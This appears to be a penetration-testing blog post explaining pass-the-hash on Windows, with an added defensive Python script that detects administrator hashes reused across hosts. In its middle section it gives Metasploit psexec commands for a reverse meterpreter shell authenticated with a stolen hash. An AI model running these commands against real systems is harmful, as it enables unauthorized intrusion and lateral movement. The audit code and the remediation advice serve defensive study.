With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.
How it works:
Once we gain root access to a system, one of the first things we do is grab password hashes (demonstrated in a previous post), and we typically jump straight to cracking them. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.
One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html.
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built-in Windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.
Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).
Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, Metasploit has a built-in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.
We're going to use a hash we've gained from target1 (an old, vulnerable Windows server) to gain access to target2 (Windows XP SP3, fully patched).
First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.
Now we start up msfconsole.
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
We then set the variables for RHOST (target2's IP) and LHOST (our IP).
set RHOST "target2 IP"
set LHOST "Our IP"
Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.
set SMBUser Administrator
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...
That's it, run "exploit".
As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.
Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.
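The condition that made this work is the same Administrator hash living on both target1 and target2. The following is an added example, not part of the original post: a defender-side audit that reads hash dumps collected from several hosts during an authorized assessment and reports any NT hash present on more than one of them. It assumes pwdump-style lines (user:rid:lm:nt:::); the hash values are constructed and target3 is a hypothetical third host.

```python
from collections import defaultdict

# Well-known NT hash of an empty password (typical for Guest); not a reuse finding.
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # well-known "no LM hash stored" value
HEX = set("0123456789abcdef")

def parse_pwdump(text):
    """Yield (user, nt_hash) from pwdump-style lines 'user:rid:lm:nt:::'; skip malformed lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        nt = parts[3].lower()  # normalise case so the same hash always compares equal
        if len(nt) == 32 and set(nt) <= HEX:
            yield parts[0], nt

def shared_hashes(dumps):
    """dumps maps host -> dump text. Return {nt_hash: [(host, user), ...]} for hashes on 2+ hosts."""
    seen = defaultdict(set)
    for host, text in dumps.items():
        for user, nt in parse_pwdump(text):
            if nt != BLANK_NT:
                seen[nt].add((host, user))
    return {nt: sorted(where) for nt, where in seen.items()
            if len({host for host, _ in where}) > 1}

# Constructed sample dumps; hash values are made up, target3 is a hypothetical third host.
REUSED = "0123456789abcdef0123456789abcdef"
UNIQUE = "fedcba9876543210fedcba9876543210"
SAMPLE = {
    "target1": f"Administrator:500:{EMPTY_LM}:{REUSED}:::\nGuest:501:{EMPTY_LM}:{BLANK_NT}:::",
    "target2": f"Administrator:500:{EMPTY_LM}:{REUSED.upper()}:::\nGuest:501:{EMPTY_LM}:{BLANK_NT}:::",
    "target3": f"Administrator:500:{EMPTY_LM}:{UNIQUE}:::\nnot a dump line",
}

if __name__ == "__main__":
    for nt, where in shared_hashes(SAMPLE).items():
        print(f"NT hash {nt[:8]}... reused on:", ", ".join(f"{h}\\{u}" for h, u in where))
```

Every entry in the result is an account whose hash, once taken from one host, is accepted by the others listed with it. Giving each host a unique local administrator password (for example with Microsoft LAPS) empties the result.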
Why is such a mechanism even possible? The only explanation that comes to mind is some bizarre implementation of token handling?